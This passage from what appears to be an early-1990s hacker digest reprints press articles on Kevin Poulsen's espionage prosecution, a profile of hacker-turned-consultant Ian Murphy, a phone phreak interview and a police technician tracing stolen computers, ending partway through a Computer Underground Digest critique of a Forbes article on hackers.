  5650. authorities in 1983.  The 17-year-old North Hollywood resident, then using the
  5651. handle Dark Dante, allegedly teamed up with an older hacker to break into
  5652. ARPAnet, a Pentagon-organized computer network that links researchers and
  5653. defense contractors around the country. He was not charged with a crime because
  5654. of his age.
  5655.  
  5656. Despite those exploits, Poulsen was later hired by SRI International, a Menlo
  5657. Park-based think tank and government contractor, and given an assistant
  5658. programming job with a security clearance.  Though SRI won't comment, one
  5659. source said Poulsen's job involved testing whether a public data network, by
  5660. means of scrambling devices, could be used to confidentially link classified
  5661. government networks.
  5662.  
  5663. But Poulsen apparently had other sidelines.  Between 1985 and 1988, the Justice
  5664. Department charges, Poulsen burglarized or used phony identification to sneak
  5665. into several Bay Area phone company offices to steal equipment and confidential
  5666. access codes that helped him monitor calls and change records in Pac Bell
  5667. computers, prosecutors say.
  5668.  
  5669.  
  5670. CACHE OF PHONE GEAR
  5671.  
  5672. The alleged activities came to light because Poulsen did not pay a bill at the
  5673. Menlo/Atherton Storage Facility.  The owner snipped off a padlock on a storage
  5674. locker and found an extraordinary cache of telephone paraphernalia.  A 19-count
  5675. indictment, which also named two of Poulsen's associates, included charges of
  5676. theft of government property, possession of wire-tapping devices and phony
  5677. identification.
  5678.  
  5679. One of Poulsen's alleged accomplices, Robert Gilligan, last year pleaded guilty
  5680. to one charge of illegally obtaining Pac Bell access codes.  Under a plea
  5681. bargain, Gilligan received three years of probation, a $25,000 fine, and agreed
  5682. to help authorities in the Poulsen prosecution.  Poulsen's former roommate,
  5683. Mark Lottor, is still awaiting trial.
  5684.  
  5685. A key issue in Poulsen's case concerns CPX Caber Dragon, a code name for a
  5686. military exercise in Fort Bragg, North Carolina.  In late 1987 or early 1988,
  5687. the government charges, Poulsen illegally obtained classified orders for the
  5688. exercise.  But Meltzer insists that the orders had been declassified by the
  5689. time they were seized, and were reclassified after the fact to prosecute
  5690. Poulsen.  Crowe said Meltzer has his facts wrong. "That's the same as saying
  5691. we're framing Poulsen," Crowe said. "That's the worst sort of accusation I can
  5692. imagine."
  5693.  
  5694. Another dispute focuses on the charge of unauthorized access to government
  5695. computers.  FBI agents found an electronic copy of the banner that a computer
  5696. user sees on first dialing up an Army network called MASNET, which includes a
  5697. warning against unauthorized use of the computer system.  Meltzer says Poulsen
  5698. never got beyond this computer equivalent of a "No Trespassing" sign.
  5699.  
  5700. Furthermore, Meltzer argues that the law is unconstitutional because it does
  5701. not sufficiently define whether merely dialing up a computer qualifies as
  5702. illegal "access."
  5703.  
  5704. Meltzer also denies that Poulsen could eavesdrop on calls.  The indictment
  5705. accuses him of illegally owning a device called a direct access test unit,
  5706. which it says is "primarily useful" for surreptitiously intercepting
  5707. communications.  But Meltzer cites an equipment manual showing that the system
  5708. is specifically designed to garble conversations, though it allows phone
  5709. company technicians to tell that a line is in use.
  5710.  
  5711. Crowe said he will soon file written rebuttals to Meltzer's motions.  In
  5712. addition to the new indictment he is seeking, federal prosecutors in Los
  5713. Angeles are believed to be investigating Poulsen's activities while a fugitive.
  5714. Among other things, Poulsen reportedly taunted FBI agents on computer bulletin
  5715. boards frequented by hackers.
  5716.  
  5717.  
  5718. PHONE COMPANIES WORRIED
  5719.  
  5720. Poulsen's prosecution is important to the government -- and phone companies --
  5721. because of their mixed record so far in getting convictions in hacker cases.
  5722.  
  5723. In one of the most embarrassing stumbles, a 19-year-old University of Missouri
  5724. student named Craig Neidorf was indicted in February 1990 on felony charges for
  5725. publishing a memorandum on the emergency 911 system of Bell South.  The case
  5726. collapsed when the phone company information -- which the government said was
  5727. worth $79,940 -- was shown by the defense to be available from another Bell
  5728. system for just $13.50.
  5729.  
  5730. Author Bruce Sterling, whose "The Hacker Crackdown" surveys recent high-tech
  5731. crime and punishment, thinks the phone company overstates the dangers from
  5732. young hackers.  On the other hand, a Toronto high school student electronically
  5733. tampered with that city's emergency telephone dispatching system and was
  5734. arrested, he noted.
  5735.  
  5736. Because systems that affect public safety are involved, law enforcement
  5737. officials are particularly anxious to win convictions and long jail sentences
  5738. for the likes of Poulsen.
  5739.  
  5740. "It's very bad when the government goes out on a case and loses," said one
  5741. computer-security expert who asked not to be identified.  "They are desperately
  5742. trying to find something to hang him on."
  5743.  
  5744. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5745.  
  5746.  Computer Hacker Charged With Stealing Military Secrets        December 8, 1992
  5747.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5748.  Taken from the Associated Press
  5749.  
  5750. SAN FRANCISCO -- A computer hacker has been charged with stealing Air Force
  5751. secrets that allegedly included a list of planned targets in a hypothetical
  5752. war.
  5753.  
  5754. Former Silicon Valley computer whiz Kevin Poulsen, who was accused in the early
  5755. 1980s as part of a major hacking case, was named in a 14-count indictment
  5756. issued Monday.
  5757.  
  5758. He and an alleged accomplice already face lesser charges of unlawful use of
  5759. telephone access devices, illegal wiretapping and conspiracy.
  5760.  
  5761. Poulsen, 27, of Los Angeles, faces 7-to-10 years in prison if convicted of the
  5762. new charge of gathering defense information, double the sentence he faced
  5763. previously.
  5764.  
  5765. His lawyer, Paul Meltzer, says the information was not militarily sensitive and
  5766. that it was reclassified by government officials just so they could prosecute
  5767. Poulsen on a greater charge.
  5768.  
  5769. A judge is scheduled to rule February 1 on Meltzer's motion to dismiss the
  5770. charge.
  5771.  
  5772. In the early 1980s, Poulsen and another hacker going by the monicker Dark Dante
  5773. were accused of breaking into UCLA's computer network in one of the first
  5774. prosecutions of computer hacking.
  5775.  
  5776. He escaped prosecution because he was then a juvenile and went to work at Sun
  5777. Microsystems in Mountain View.
  5778.  
  5779. While working for Sun, Poulsen illegally obtained a computer tape containing a
  5780. 1987 order concerning a military exercise code-named Caber Dragon 88, the
  5781. government said in court papers.  The order is classified secret and contains
  5782. names of military targets, the government said.
  5783.  
  5784. In 1989, Poulsen and two other men were charged with stealing telephone access
  5785. codes from a Pacific Bell office, accessing Pacific Bell computers, obtaining
  5786. unpublished phone numbers for the Soviet Consulate in San Francisco; dealing in
  5787. stolen telephone access codes; and eavesdropping on two telephone company
  5788. investigators.
  5789.  
  5790. Poulsen remained at large until a television show elicited a tip that led to
  5791. his capture in April 1991.
  5792.  
  5793. He and Mark Lottor, 27, of Menlo Park, are scheduled to be tried in March.  The
  5794. third defendant, Robert Gilligan, has pleaded guilty and agreed to pay Pacific
  5795. Bell $25,000.  He is scheduled to testify against Lottor and Poulsen as part of
  5796. a plea bargain.
  5797.  
  5798. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5799.  
  5800.  CA Computer Whiz Is First Hacker Charged With Espionage      December 10, 1992
  5801.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5802.  by John Enders (The Associated Press)
  5803.  
  5804. SAN JOSE, California -- A 28-year-old computer whiz who reportedly once tested
  5805. Department of Defense security procedures has become the first alleged computer
  5806. hacker to be charged with espionage.
  5807.  
  5808. The government says Kevin Lee Poulsen stole classified military secrets and
  5809. should go to prison.  But his lawyer calls him "an intellectually curious
  5810. computer nerd."
  5811.  
  5812. Poulsen, of Menlo Park, California, worked in the mid-1980s as a consultant
  5813. testing Pentagon computer security.  Because of prosecution delays, he was held
  5814. without bail in a San Jose jail for 20 months before being charged this week.
  5815.  
  5816. His attorney, Paul Meltzer, says that Poulsen did not knowingly possess
  5817. classified information.  The military information had been declassified by the
  5818. time prosecutors say Poulsen obtained it, Meltzer said.
  5819.  
  5820. "They are attempting to make him look like Julius Rosenberg," Meltzer said of
  5821. the man executed in 1953 for passing nuclear-bomb secrets to the Soviet Union.
  5822. "It's just ridiculous."
  5823.  
  5824. Poulsen was arrested in 1988 on lesser but related hacking charges. He
  5825. disappeared before he was indicted and was re-arrested in Los Angeles in April
  5826. 1991.  Under an amended indictment, he was charged with illegal possession of
  5827. classified government secrets.
  5828.  
  5829. Poulsen also is charged with 13 additional counts, including eavesdropping on
  5830. private telephone conversations and stealing telephone company equipment.
  5831.  
  5832. If convicted on all counts, he faces up to 85 years in prison and fines
  5833. totaling $3.5 million, said Assistant U.S. Attorney Robert Crowe in San
  5834. Francisco.
  5835.  
  5836. On Monday (12/7), Poulsen pleaded innocent to all charges.  He was handed over
  5837. to U.S. Marshals in San Jose on Wednesday (12/9) and was being held at a
  5838. federal center in Pleasanton near San Francisco.
  5839.  
  5840. He hasn't been available for comment, but in an earlier letter from prison,
  5841. Poulsen called the charges "ludicrous" and said the government is taking
  5842. computer hacking too seriously.
  5843.  
  5844. U.S. Attorney John A. Mendez said Wednesday (12/9) that Poulsen is not
  5845. suspected of turning any classified or non-classified information over to a
  5846. foreign power, but he said Poulsen's alleged activities are being taken very
  5847. seriously.
  5848.  
  5849. "He's unique.  He's the first computer hacker charged with this type of
  5850. violation -- unlawful gathering of defense information," Mendez said.
  5851.  
  5852. Assistant U.S. Attorney Robert Crowe said the espionage charge was entered only
  5853. after approval from the Justice Department's internal security section in
  5854. Washington.
  5855.  
  5856. The indictment alleges that Poulsen:
  5857.  
  5858. - Tapped into the Pacific Bell Co.'s computer and collected unpublished
  5859.   telephone numbers and employee lists for the Soviet Consulate in San
  5860.   Francisco.
  5861.  
  5862. - Stole expensive telephone switching and other equipment.
  5863.  
  5864. - Retrieved records of phone company security personnel and checked records of
  5865.   their own calls to see if they were following him.
  5866.  
  5867. - Eavesdropped on telephone calls and computer electronic mail between phone
  5868.   company investigators and some of his acquaintances.
  5869.  
  5870. - Tapped into an unclassified military computer network known as Masnet.
  5871.  
  5872. - Obtained a classified document on flight orders for a military exercise
  5873.   involving thousands of paratroopers at the Army's Fort Bragg in North
  5874.   Carolina.
  5875.  
  5876. The offenses allegedly took place between 1986 and 1988.
  5877.  
  5878. In 1985, the Palo Alto, California, think tank SRI International hired Poulsen
  5879. to work on military contracts, including a sensitive experiment to test
  5880. Pentagon computer security, according to published reports.  SRI has declined
  5881. to comment on the case.
  5882. _______________________________________________________________________________
  5883.  
  5884.  Hacker For Hire                                               October 19, 1992
  5885.  ~~~~~~~~~~~~~~~
  5886.  by Mark Goodman and Allison Lynn (People)(Page 151)
  5887.  
  5888.         "Real-life Sneaker Ian Murphy puts the byte on corporate spies."
  5889.  
  5890. THERE'S NO PRIVACY THESE DAYS," says Ian Murphy.  "Just imagine going into GM's
  5891. or IBM's accounts and wiping them out.  You can bring about economic collapse
  5892. by dropping in a virus without them even knowing it."  Scoff at your peril,
  5893. Corporate America.  Captain Zap -- as Murphy is known in the electronic
  5894. underworld of computer hackers -- claims there's no computer system he can't
  5895. crack, and hence no mechanical mischief he can't wreak on corporations or
  5896. governments.  And Murphy, 35, has the track record -- not to mention the
  5897. criminal record -- to back up his boasts.
  5898.  
  5899. Murphy's fame in his subterranean world is such that he worked as a consultant
  5900. for Sneakers, the hit film about a gang of computer-driven spies (Robert
  5901. Redford, Sidney Poitier, Dan Aykroyd) lured into doing some high-risk
  5902. undercover work for what they believe is the National Security Agency.
  5903.  
  5904. Murphy loved the way the movie turned out.  "It's like a training film for
  5905. hackers," he says, adding that he saw much of himself in the Aykroyd character,
  5906. a pudgy, paranoid fantasist named Mother who, like Murphy, plows through
  5907. people's trash for clues.  In fact when Aykroyd walked onscreen covered with
  5908. trash, Murphy recalls, "My friends turned to me and said, 'Wow, that's you!'"
  5909. If that sounds like a nerd's fantasy, then check out Captain Zap's credentials.
  5910. Among the first Americans to be convicted of a crime involving  computer break-
  5911. ins, he served only some easy community-service time in 1983 before heading
  5912. down the semistraight, not necessarily narrow, path of a corporate spy.
  5913.  
  5914. Today, Murphy, 35, is president of IAM Secure Data Systems, a security
  5915. consultant group he formed in 1982.  For a fee of $5,000 a day plus expenses,
  5916. Murphy has dressed up as a phone-company employee and cracked a bank's security
  5917. system, he has aided a murder investigation for a drug dealer's court defense,
  5918. and he has conducted a terrorism study for a major airline.  His specialty,
  5919. though, is breaking into company security systems -- an expertise he applied
  5920. illegally in his outlaw hacker days and now, legally, by helping companies
  5921. guard against such potential break-ins.  Much of his work lately, he says,
  5922. involves countersurveillance -- that is, finding out if a corporation's
  5923. competitors are searching its computer systems for useful information.  "It's
  5924. industrial spying," Murphy says, "and it's happening all over the place."
  5925.  
  5926. Murphy came by his cloak-and-daggerish calling early.  He grew up in Gladwyne,
  5927. Pennsylvania, on Philadelphia's Main Line, the son of Daniel Murphy, a retired
  5928. owner of a stevedoring business, and his wife, Mary Ann, an advertising
  5929. executive.  Ian recalls, "As a kid, I was bored.  In science I did wonderfully.
  5930. The rest of it sucked.  And social skills weren't my thing."
  5931.  
  5932. Neither was college.  Ian had already begun playing around with computers at
  5933. Archbishop Carroll High School; after graduation he joined the Navy.  He got an
  5934. early discharge in 1975 when the Navy didn't assign him to radio school as
  5935. promised, and he returned home to start hacking with a few pals.  In his
  5936. heyday, he claims, he broke into White House and Pentagon computers.  "In the
  5937. Pentagon," he says, "we were playing in the missile department, finding out
  5938. about the new little toys they were developing and trying to mess with their
  5939. information. None of our break-ins had major consequences, but it woke them the
  5940. hell up because they [had] all claimed it couldn't be done."
  5941.  
  5942. Major consequences came later.  Murphy and his buddies created dummy
  5943. corporations with Triple-A credit ratings and ordered thousands of dollars'
  5944. worth of computer equipment.  Two years later the authorities knocked at
  5945. Murphy's door.  His mother listened politely to the charges, then earnestly
  5946. replied, "You have the wrong person.  He doesn't know anything about
  5947. computers."
  5948.  
  5949. Right.  Murphy was arrested and convicted of receiving stolen property in 1982.
  5950. But because there were no federal computer-crime laws at that time, he got off
  5951. with a third-degree felony count.  He was fined $1,000, ordered to provide
  5952. 1,000 hours of community service (he worked in a homeless shelter) and placed
  5953. on probation for 2 1/2 years.  "I got off easy," he concedes.
  5954.  
  5955. Too easy, by his own mother's standards.  A past president of Republican Women
  5956. of the Main Line, Mary Ann sought out her Congressman, Larry Coughlin, and put
  5957. the question to him: "How would you like it if the next time you ran for
  5958. office, some young person decided he was going to change all of your files?"
  5959. Coughlin decided he wouldn't like it and raised the issue on the floor of
  5960. Congress in 1983.  The following year, Congress passed a national computer-
  5961. crime law, making it illegal to use a computer in a manner not authorized by
  5962. the owner.
  5963.  
  5964. Meanwhile, Murphy, divorced in 1977 after a brief marriage, had married Carol
  5965. Adrienne, a documentary film producer, in 1982.  Marriage evidently helped set
  5966. Murphy straight, and he formed his company -- now with a staff of 12 that
  5967. includes a bomb expert and a hostage expert.  Countersurveillance has been
  5968. profitable (he's making more than $250,000 a year and is moving out of his
  5969. parents' house), but it has left him little time to work on his social skills -
  5970. - or for that matter his health.  At 5 ft.6 in. and 180 lbs., wearing jeans,
  5971. sneakers and a baseball cap, Murphy looks like a Hollywood notion of himself.
  5972. He has suffered four heart attacks since 1986 but unregenerately smokes a pack
  5973. of cigarettes a day and drinks Scotch long before the sun falls over the
  5974. yardarm.
  5975.  
  5976. He and Carol divorced in April 1991, after 10 years of marriage.  "She got
  5977. ethics and didn't like the work I did," he says.  These days Murphy dates --
  5978. but not until he thoroughly "checks" the women he goes out with.  "I want to
  5979. know who I'm dealing with because I could be dealing with plants," he explains.
  5980. "The Secret Service plays games with hackers."
  5981.  
  5982. Murphy does retain a code of honor.  He will work for corporations, helping to
  5983. keep down the corporate crime rate, he says, but he won't help gather evidence
  5984. to prosecute fellow hackers.  Indeed his rogue image makes it prudent for him
  5985. to stay in the background.  Says Reginald Branham, 23, president of Cyberlock
  5986. Consulting, with whom Murphy recently developed a comprehensive antiviral
  5987. system: "I prefer not to take Ian to meetings with CEOs.  They're going to
  5988. listen to him and say, 'This guy is going to tear us apart.'"  And yet Captain
  5989. Zap, for all his errant ways, maintains a certain peculiar charm.  "I'm like
  5990. the Darth Vader of the computer world," he insists.  "In the end I turn out to
  5991. be the good guy."
  5992.  
  5993. (Photograph 1 = Ian Murphy)
  5994. (Photograph 2 = River Phoenix, Robert Redford, Dan Aykroyd, and Sidney Poitier)
  5995. (Photograph 3 = Mary Ann Murphy <Ian's mom>)
  5996. _______________________________________________________________________________
  5997.  
  5998.  Yacking With A Hack                                                August 1992
  5999.  ~~~~~~~~~~~~~~~~~~~
  6000.  by Barbara Herman (Teleconnect)(Page 60)
  6001.  
  6002.                  "Phone phreaking for fun, profit & politics."
  6003.  
  6004. Ed is an intelligent, articulate 18 year old.  He's also a hacker, a self-
  6005. professed "phreak" -- the term that's developed in a subculture of usually
  6006. young, middle-class computer whizzes.
  6007.  
  6008. I called him at his favorite phone booth.
  6009.  
  6010. Although he explained how he hacks as well as what kinds of hacking he has been
  6011. involved in, I was especially interested in why he hacks.
  6012.  
  6013. First off, Ed wanted to make it clear he doesn't consider himself a
  6014. "professional" who's in it only for the money.  He kept emphasizing that
  6015. "hacking is not only an action, it's a state of mind."
  6016.  
  6017. Phreaks even have an acronym-based motto that hints at their overblown opinions
  6018. of themselves.  PHAC.  It describes what they do: "phreaking," "hacking,"
  6019. "anarchy" and "carding."  In other words, they get into systems over the
  6020. telecom network (phreaking), gain access (hacking), disrupt the systems
  6021. (political anarchy) and use peoples' calling/credit cards for their personal
  6022. use.
  6023.  
  6024. Throughout our talk, Ed showed no remorse for hacking.  Actually, he had
  6025. contempt for those he hacked.  Companies were "stupid" because their systems'
  6026. were so easy to crack.  They deserved it.
  6027.  
  6028. As if they should have been thankful for his mercy, he asked me to imagine what
  6029. would have happened if he really hacked one railway company's system (he merely
  6030. left a warning note), changing schedules and causing trains to collide.
  6031.  
  6032. He also had a lot of disgust for the "system," which apparently includes big
  6033. business (he is especially venomous toward AT&T), government, the FBI, known as
  6034. "the Gestapo" in phreak circles, and the secret service, whose "intelligence
  6035. reflects what their real jobs should be, secret service station attendants."
  6036.  
  6037. He doesn't really believe any one is losing money on remote access toll fraud.
  6038.  
  6039. He figures the carriers are angry not about money lost but rather hypothetical
  6040. money, the money they could have charged for the free calls the hackers made,
  6041. which he thinks are overpriced to begin with.
  6042.  
  6043. He's also convinced (wrongly) that companies usually don't foot the bill for
  6044. the free calls hackers rack up on their phone systems.  "And, besides, if some
  6045. multi-million dollar corporation has to pay, I'm certainly not going to cry for
  6046. them."
  6047.  
  6048. I know.  A twisted kid.  Weird.  But besides his skewed ethics, there's also a
  6049. bunch of contradictions.
  6050.  
  6051. He has scorn for companies who can't keep him out, even though he piously warns
  6052. them to try.
  6053.  
  6054. He dismisses my suggestion that the "little guy" is in fact paying the bills
  6055. instead of the carrier.  And yet he says AT&T is overcharging them for the
  6056. "vital" right to communicate with each other.
  6057.  
  6058. He also contradicted his stance of being for the underdog by calling the
  6059. railway company "stupid" for not being more careful with their information.
  6060.  
  6061. Maybe a railway company is not necessarily the "little guy," but it hardly
  6062. seems deserving of the insults Ed hurled at it.  When I mentioned that a
  6063. hospital in New York was taken for $100,000 by hackers, he defended the hackers
  6064. by irrelevantly making the claim that doctors easily make $100,000 a year.
  6065. Since when did doctors pay hospital phone bills?
  6066.  
  6067. What Ed is good at is rationalizing.  He lessens his crimes by raising them to
  6068. the status of political statements, and yet in the same breath, for example, he
  6069. talks about getting insider info on the stock market and investing once he
  6070. knows how the stock is doing.  He knows it's morally wrong, he told me, but
  6071. urged me to examine this society that "believes in making a buck any way you
  6072. can.  It's not a moral society."
  6073.  
  6074. Amazingly enough, the hacker society to which Ed belongs, if I can
  6075. unstatistically use him as a representative of the whole community, is just as
  6076. tangled in the contradictions of capitalism as the "system" they supposedly
  6077. loathe.  In fact, they are perhaps more deluded and hypocritical because they
  6078. take a political stance rather than recognizing their crimes for what they are.
  6079. How can Ed or anyone else in the "phreaking" community take seriously their
  6080. claims of being against big business and evil capitalism when they steal
  6081. people's credit-card and calling-card numbers and use them for their own
  6082. profit?
  6083.  
  6084. The conversation winded down after Ed rhapsodized about the plight of the
  6085. martyred hacker who is left unfairly stigmatized after he is caught, or "taken
  6086. down."
  6087.  
  6088. One time the Feds caught his friend hacking ID codes, had several phone
  6089. companies and police search his house, and had his computer taken away.  Even
  6090. though charges were not filed, Ed complained, "It's not fair."
  6091.  
  6092. That's right, phreak.  They should have thrown him in prison.
  6093. _______________________________________________________________________________
  6094.  
  6095.  Computer Hacker On Side Of Law                              September 23, 1992
  6096.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6097.  by Shelby Grad (Los Angeles Times)(Page B3)
  6098.  
  6099. COSTA MESA, CA -- Philip Bettencourt's formal title is photo lab supervisor for
  6100. the Costa Mesa Police Department.  But on Tuesday afternoon, he served as the
  6101. department's official computer hacker.
  6102.  
  6103. Bettencourt, pounding the keyboard excitedly as other officers looked on, was
  6104. determined to find information within a stolen computer's vast memory that
  6105. would link the machine to its owner.
  6106.  
  6107. So far, he had made matches for all but two of the 26 computers recovered
  6108. earlier this month by police as part of a countywide investigation of stolen
  6109. office equipment.  This would be number 25.
  6110.  
  6111. First, he checked the hard drive's directory, searching for a word-processing
  6112. program that might include a form letter or fax cover sheet containing the
  6113. owner's name, address or phone number.
  6114.  
  6115. When that failed, he tapped into an accounting program, checking for clues on
  6116. the accounts payable menu.
  6117.  
  6118. "Bingo!"  Bettencourt yelled a few minutes into his work.  He found an invoice
  6119. account number to a Fountain Valley cement company that might reveal the
  6120. owner's identity.  Seconds later, he came across the owner's bank credit-card
  6121. number.
  6122.  
  6123. And less than a minute after that, Bettencourt hit pay dirt: The name of a
  6124. Santa Ana building company that, when contacted, revealed that it had indeed
  6125. been the victim of a recent computer burglary.
  6126.  
  6127. "This is great," said Bettencourt, who has been interested in computers for
  6128. nearly two decades now, ever since Radio Shack put its first model on the
  6129. market.  "I love doing this.  This is hacking, but it's in a good sense, not
  6130. trying to hurt someone.  This is helping people."
  6131.  
  6132. Few computer owners who were reunited with their equipment would contest that.
  6133. When Costa Mesa police recovered $250,000 worth of computers, fax machines,
  6134. telephones and other office gadgets, detectives were faced with the difficult
  6135. task of matching machines bearing few helpful identifying marks to their
  6136. owners, said investigator Bob Fate.
  6137.  
  6138. Enter Bettencourt, who tapped into the computers' hard drives, attempting to
  6139. find the documents that would reveal from whom the machines were taken.
  6140.  
  6141. As of Tuesday, all but $50,000 worth of equipment was back in owners' hands.
  6142. Investigators suggested that people who recently lost office equipment call the
  6143. station to determine if some of the recovered gadgetry belongs to them.
  6144.  
  6145. Ironically, the alleged burglars tripped themselves up by not erasing the data
  6146. from the computers before reselling the machines, authorities said.  A college
  6147. student who purchased one of the stolen computers found data from the previous
  6148. owner, whom he contacted.  Police were then called in, and a second "buy" was
  6149. scheduled in which several suspects were arrested, Fate said.
  6150.  
  6151. Three people were arrested September 15 and charged with receiving and
  6152. possessing stolen property.  Police are still searching for the burglars.
  6153.  
  6154. The office equipment was recovered from an apartment and storage facility in
  6155. Santa Ana.
  6156.  
  6157. Bettencourt matched the final stolen computer to its owner before sundown
  6158. Tuesday.
  6159. _______________________________________________________________________________
  6160.  
  6161.  CuD's 1992 MEDIA HYPE Award To FORBES MAGAZINE
  6162.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6163.  by Jim Thomas (Computer Underground Digest)
  6164.  
  6165. In recent years, media depiction of "hackers" has been criticized for
  6166. inaccurate and slanted reporting that exaggerates the public dangers of the
  6167. dread "hacker menace." As a result, CuD annually recognizes the year's most
  6168. egregious example of media hype.
  6169.  
  6170. The 1992 annual CuD GERALDO RIVERA MEDIA HYPE award goes to WILLIAM G. FLANAGAN
  6171. AND BRIGID McMENAMIN for their article "The Playground Bullies are Learning how
  6172. to Type" in the 21 December issue of Forbes (pp 184-189).  The authors improved
  6173. upon last year's winner, Geraldo himself, in inflammatory rhetoric and
  6174. distorted narrative that seems more appropriate for a segment of "Inside
  6175. Edition" during sweeps week than for a mainstream conservative periodical.
  6176.  
  6177. The Forbes piece is the hands-down winner for two reasons.  First, one reporter
  6178. of the story, Brigid McMenamin, was exceptionally successful in creating for
  6179. herself an image as clueless and obnoxious. Second, the story itself was based
  6180. on faulty logic, rumors, and some impressive leaps of induction.  Consider the
  6181. following.
  6182.  
  6183.  
  6184.                          The Reporter: Brigid McMenamin
  6185.  
  6186. It's not only the story's gross errors, hyperbole, and irresponsible distortion
  6187. that deserve commendation/condemnation, but the way that Forbes reporter Brigid
  6188. McMenamin tried to sell herself to solicit information.
  6189.  
  6190. One individual contacted by Brigid McM claimed she called him several times
  6191. "bugging" him for information, asking for names, and complaining because
  6192. "hackers" never called her back.  He reports that she explicitly stated that
  6193. her interest was limited to the "illegal stuff" and the "crime aspect" and was
  6194. oblivious to facts or issues that did not bear upon hackers-as-criminals.
  6195.  
  6196. Some persons present at the November 2600 meeting at Citicorp, which she
  6197. attended, suggested the possibility that she used another reporter as a
  6198. credibility prop, followed some of the participants to dinner after the
  6199. meeting, and was interested in talking only about illegal activities. One
  6200. observer indicated that those who were willing to talk to her might not be the
  6201. most credible informants.  Perhaps this is one reason for her curious language
  6202. in describing the 2600 meeting.
  6203.  
  6204. Another person she contacted indicated that she called him wanting names of
  6205. people to talk to and indicated that because Forbes is a business magazine, it
  6206. only publishes the "truth."  Yet, she seemed not so much interested in "truth,"
  6207. but in finding "evidence" to fit a story.  He reports that he attempted to
  6208. explain that hackers generally are interested in Unix and she asked if she
  6209. could make free phone calls if she knew Unix.  Although the reporter stated to
  6210. me several times that she had done her homework, my own conversation with her
  6211. contradicted her claims, and if the reports of others are accurate, here claims
  6212. of preparation seem disturbingly exaggerated.
  6213.  
  6214. I also had a rather unpleasant exchange with Ms. McM.  She was rude, abrasive,
  6215. and was interested in obtaining the names of "hackers" who worked for or as
  6216. "criminals." Her "angle" was clearly the hacker-as-demon.  Her questions
  6217. suggested that she did not understand the culture about which she was writing.
  6218. She would ask questions and then argue about the answer, and was resistant to
  6219. any "facts" or responses that failed to focus on "the hacker criminal." She
  6220. dropped Emmanuel Goldstein's name in a way that I interpreted as indicating a
  6221. closer relationship than she had--an incidental sentence, but one not without
  6222. import -- which I later discovered was either an inadvertently misleading
  6223. choice of words or a deliberate attempt to deceptively establish credentials.
  6224. She claimed she was an avowed civil libertarian.  I asked why, then, she didn't
  6225. incorporate some of those issues. She invoked publisher pressure.  Forbes is a
  6226. business magazine, she said, and the story should be of interest to readers.
  6227. She indicated that civil liberties weren't related to "business."  She struck
  6228. me as exceptionally ill-informed and not particularly good at soliciting
  6229. information.  She also left a post on Mindvox inviting "hackers" who had been
  6230. contacted by "criminals" for services to contact her.
  6231.  
  6232.      >Post: 150 of 161
  6233.      >Subject: Hacking for Profit?
  6234.      >From: forbes (Forbes Reporter)
  6235.      >Date: Tue, 17 Nov 92 13:17:34 EST
  6236.      >
  6237.      >Hacking for Profit?  Has anyone ever offered to pay you (or
  6238.      >a friend) to get into a certain system and alter, destroy or
  6239.      >retrieve information?  Can you earn money hacking credit
  6240.      >card numbers, access codes or other information? Do you know
  6241.      >where to sell it?  Then I'd like to hear from you.  I'm
  6242.      >doing research for a magazine article.  We don't need you
  6243.      >name.  But I do want to hear your story.  Please contact me
  6244.      >Forbes@mindvox.phantom.com.
  6245.  
  6246. However, apparently she wasn't over-zealous about following up her post or
  6247. reading the Mindvox conferences.  When I finally agreed to send her some
  6248. information about CuD, she insisted it be faxed rather than sent to Mindvox
  6249. because she was rarely on it.  Logs indicate that she made only six calls to
  6250. the board, none of which occurred after November 24.
  6251.  
  6252. My own experience with the Forbes reporter was consistent with those of others.
  6253. She emphasized "truth" and "fact-checkers," but the story seems short on both.
  6254. She emphasized explicitly that her story would *not* be sensationalistic. She
  6255. implied that she wanted to focus on criminals and that the story would have the
  6256. effect of presenting the distinction between "hackers" and real criminals.
  6257. Another of her contacts also appeared to have the same impression.  After our
  6258. less-than-cordial discussion, she reported it to the contact, and he attempted
  6259. to intercede on her behalf in the belief that her intent was to dispel many of
  6260. the media inaccuracies about "hacking."  If his interpretation is correct, then
  6261. she deceived him as well, because her portrayal of him in the story was
  6262. unfavorably misleading.
  6263.  
  6264. In CuD 4.45 (File #3), we ran Mike Godwin's article on "How to Talk to the
  6265. Press," which should be required reading. His guidelines included:
  6266.  
  6267.      1) TRY TO THINK LIKE THE REPORTER YOU'RE TALKING TO.
  6268.      2) IF YOU'RE GOING TO MEET THE REPORTER IN PERSON, TRY TO
  6269.         BRING SOMETHING ON PAPER.
  6270.      3) GIVE THE REPORTER OTHER PEOPLE TO TALK TO, IF POSSIBLE.
  6271.      4) DON'T ASSUME THAT THE REPORTER WILL COVER THE STORY THE WAY
  6272.         YOU'D LIKE HER TO.
  6273.  
  6274. Other experienced observers contend that discussing "hacking" with the press
  6275. should be avoided unless one knows the reporter well or if the reporter has
  6276. established sufficient credentials as accurate and non-sensationalist.  Using
  6277. these criteria, it will probably be a long while before any competent
  6278. cybernaught again speaks to Brigid McMenamin.
  6279.  
  6280.  
  6281.                                    The Story
  6282.  
  6283. Rather than present a coherent and factual story about the types of computer
  6284. crime, the authors instead make "hackers" the focal point and use a narrative
  6285. strategy that conflates all computer crime with "hackers."
  6286.  
  6287. The story implies that Len Rose is part of the "hacker hood" crowd.  The lead
  6288. reports Rose's prison experience and relates his feeling that he was "made an
  6289. example of" by federal prosecutors.  But, asks the narrative, if this is so,
  6290. then why is the government cracking down? Whatever else one might think of Len
  6291. Rose, no one ever has implied that he as a "playground bully" or "hacker hood."
  6292. The story also states that 2600 Magazine editor Emmanuel Goldstein "hands
  6293. copies <of 2600> out free of charge to kids.  Then they get arrested." (p. 188-
  6294. -a quote attributed to Don Delaney), and distorts (or fabricates) facts to fit
  6295. the slant:
  6296.  
  6297.      According to one knowledgeable source, another hacker brags
  6298.      that he recently found a way to get into Citibank's
  6299.      computers. For three months he says he quietly skimmed off a
  6300.      penny or so from each account. Once he had $200,000, he quit.
  6301.      Citibank says it has no evidence of this incident and we
  6302.      cannot confirm the hacker's story.  But, says computer crime
